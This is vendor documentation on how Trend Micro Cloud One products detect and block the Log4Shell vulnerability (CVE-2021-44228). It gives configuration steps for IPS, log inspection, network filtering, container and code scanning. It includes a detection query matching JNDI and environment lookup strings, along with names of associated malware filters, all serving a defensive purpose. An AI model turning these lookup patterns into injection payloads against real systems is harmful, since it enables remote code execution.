Trend Micro Cloud One coverage of Log4j vulnerability

On December 9, 2021, a new critical zero-day vulnerability impacting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed. If exploited, this vulnerability could result in Remote Code Execution (RCE) by logging a certain string on affected installations. This specific vulnerability has been assigned CVE-2021-44228 and is also being commonly referred to as "Log4Shell" in various blogs and reports.

Trend Micro Cloud One provides extensive coverage for this new vulnerability throughout your environment:

  • Prevent attacks on your computers by virtually patching the vulnerability with Workload Security. Workload Security also provides a Log Inspection rule for detecting the attack, and Anti-Malware capabilities for detecting and preventing an attack.
  • Prevent denial of service attacks and JNDI injection/look-ups using Network Security.
  • Prevent attacks on running applications by monitoring them with Application Security, which stops unexpected shell commands from executing.
  • Identify vulnerable versions of the log4j library across your organization's source code repositories and monitor progress on updating to non-vulnerable versions using Open Source Security by Snyk.
  • Detect container images that have Log4j with Container Security.
  • Use Conformity to check for Log4j in your cloud environment.

Watch a video showing how Trend Micro Cloud One protects against this vulnerability. We also have a growing list of Trend Micro resources about this issue.


Workload Security

Workload Security provides Intrusion Prevention rules that focus on preventing the attack using virtual patching, a Log Inspection rule for detecting the attack, and Anti-Malware capabilities for detecting and preventing an attack.

For detailed information on how to make sure you're covered, see Workload Security coverage of Log4j vulnerability.

Workload Security includes the Intrusion Prevention module (IPS), which protects your computers from zero-day vulnerabilities and other attacks. Intrusion Prevention rules provide "virtual patching" by intercepting traffic that's trying to exploit the vulnerability, protecting your workloads until vendor's patches that fix the vulnerability are released, tested, and deployed.

The Trend Micro Labs team has provided a new IPS rule to address this vulnerability:

1011242 - Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

Apply virtual patching for the Log4j vulnerability

Follow the steps below to check whether the new rule is protecting your workloads.

  1. In the Workload Security console, go to Administration > Updates > Security > Rules.

  2. The new rule is included in 21-057.dsru. Check that the rule update is shown as Applied.

    Rule Updates page

    Details for DSRU 21-057

  3. If the rule isn't applied, run a recommendation scan. We suggest that you create a 'run once' scheduled task and select the Run Task on 'Finish' option.

    Recommendation scan scheduled task

  4. To ensure that the rule gets applied wherever it's recommended, open the policy that is assigned to the computers you just scanned, go to Intrusion Prevention > General, and search for rule 1011242. Select the checkbox next to the rule name to assign it to the policy. All computers protected by this policy will have the rule applied to it.

    You may need to update the port list for applications running on non-default ports.

  5. Intrusion Prevention operates in either Detect or Prevent mode. Detect mode generates events about rule violations but doesn't block traffic. Prevent mode generates events and blocks traffic that matches rules, to prevent attacks. To set Prevent mode, open the computer or policy editor, go to Intrusion Prevention > General and set Intrusion Prevention Behavior to Prevent. Click Save.

Apply the IPS rule without running a recommendation scan

If you don't want to run a recommendation scan, you can apply the rule directly to the base policy.

  1. In the Workload Security console, go to Policies.
  2. Double-click the Base Policy to display the policy details.
  3. Select Intrusion Prevention.
  4. On the General tab, ensure that Intrusion Prevention State is set to On and Intrusion Prevention Behavior is set to Prevent.
  5. In the Assigned Intrusion Prevention Rules section, select Assign/Unassign. The IPS Rules page opens.
  6. Search for rule 1011242. Select the checkbox next to the rule name to assign it to the policy. Select OK.
  7. On the Base Policy page, select Save and ensure that the Mode for the rule is set to Prevent.

    Assigned Intrusion Prevention Rules

Identify potentially affected hosts

If you are also using Trend Micro Vision One, you can use the following query to identify hosts that may be affected by this vulnerability:

eventName:DEEP_PACKET_INSPECTION_EVENT AND (ruleId:1008610 OR ruleId:1011242 OR ruleId:1005177) AND ("${" AND ("lower:" OR "upper:" OR "sys:" OR "env:" OR "java:" OR "jndi:"))

Use a Log Inspection rule to investigate activity

Trend Micro has provided a Log Inspection rule to help identify activity related to this vulnerability:

1011241 - Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

Check the rule configuration to make sure the correct log file is being monitored. If default access log path is not /var/log/*/access.log, add your application access log file path.

You can also create a custom Log Inspection rule to detect patterns that are discovered in the future. For details, see Custom Log Inspection Rules for Log4Shell Vulnerability on Trend Micro Cloud One - Workload Security and Deep Security.


Network Security

Network Security provides a filter that helps to prevent attacks. It also provides additional controls that can be used to disrupt the attack chain, like Geolocation filtering to block regions and anonymous proxies, and Domain Filtering to prevent unsanctioned access to domains not on a permit list.

The Network Security filter that helps to prevent attacks is Filter 40627 : HTTP: JNDI Injection in HTTP Header or URI, which was released in Digital Vaccine #9621. This filter is for denial of service vulnerabilities and also prevents JNDI injection/look ups.

We recommend that you enable this filter in a block and notify posture for optimal coverage. Starting with Digital Vaccines released on 12/21/2021, it will be enabled by default. Since it may not be enabled in your environment, we strongly recommend that you confirm the filter is enabled in your policy. See the Network Security documentation for information about filters and how to add cloud accounts and appliances.

Network Security also provides additional controls to disrupt the attack chain, described in the next section.

Other Network Security controls that can disrupt the attack

This attack is successful when the exploit is used to initiate a transfer of a malicious attack payload. In addition to the filter described above, these techniques can help disrupt that chain:

  • Use Geolocation filtering to reduce possible attack vectors. Geolocation filtering can block inbound and outbound connections to any specified country, which may limit the ability for attackers to exploit the environment. In cases where a business only operates in certain regions of the globe, proactively blocking other countries may be advisable. Learn about geolocation filtering.
  • Anonymous proxies are also an independent, configurable “region” that can be selected as part of Geolocation filtering. This will block any inbound or outbound connection to/from an anonymous proxy or anonymizer service, which can be commonly used as part of exploit attempts.
  • Use domain filtering to limit the attack vectors and disrupt the attack chain used to exploit this vulnerability. In this case, any outbound connection over TCP is dropped unless the domain being accessed is on a permit list. If the attacker’s domain, e.g. http://attacker.com, is not on the permit list, then it would be blocked by default, regardless of IPS filter policy. Learn about domain filtering.

Identify potentially affected hosts

With Network Security, you can also use Filters (40641: HTTP: Worm.Shell.Tsunami. B Runtime Detection and 40643: TCP: Trojan.Linux.Sonawatsi. A Runtime Detection) to locate Log4j associated indicators of malware and ransomware, identified as actively circulating by our threat research team. If you receive an alert or event associated with these filters, take action immediately. Prioritize triaging the affected hosts as this may indicate a potential Log4j associated compromise.


Application Security

Application Security can monitor running applications and stops unexpected shell commands from executing.

To help protect against certain exploits associated with this vulnerability:

  1. Open the Application Security console and in the left menu bar, select Group Policy icon.
  2. Find your application's group.
  3. Select Remote Command Execution, if it isn't already selected.
  4. In the right pane, select Configure Policy icon.
  5. Select < INSERT RULE >.
  6. In Enter a pattern to match, enter (?s).* and select Submit and the Save Changes.
  7. Check that "Mitigate" is selected in your "Remote Command Execution" line item.

A blocked exploit attempt looks like this:

Blocked exploit attempt


Open Source Security by Snyk

Open Source Security by Snyk can identify vulnerable versions of the log4j library across your organization's source code repositories with very little integration effort. Once installed, it can also monitor progress on updating to non-vulnerable versions.

OSS by Snyk Log4j detection


Container Security

Container Security detects container images that have Log4j.

To protect your containers:

  1. Scan all of your images with a Deep Security Smart Check that is registered in Container Security.
  2. Set a Container Security policy.

    The policy should block the deployment of both unscanned images and images that contain critical vulnerabilities:

    Policy that blocks unscanned imamges and critical vulnerabilities

    It should also terminate the running of both unscanned images and images that contain critical vulnerabilities:

    Policy that terminates unscanned imamges and critical vulnerabilities

    Terminating unscanned images will terminate all images that haven't been scanned, including items not specific to Log4j.


Conformity

Conformity provides central visibility and real-time monitoring of your cloud infrastructure by enabling you to auto-check against nearly 1000 cloud service configuration best practices across 90+ services and avoid cloud service misconfigurations.

Conformity provides the following rules to check for Log4j. See Rules configuration for instructions on how to configure rules.


More resources from Trend Micro about this vulnerability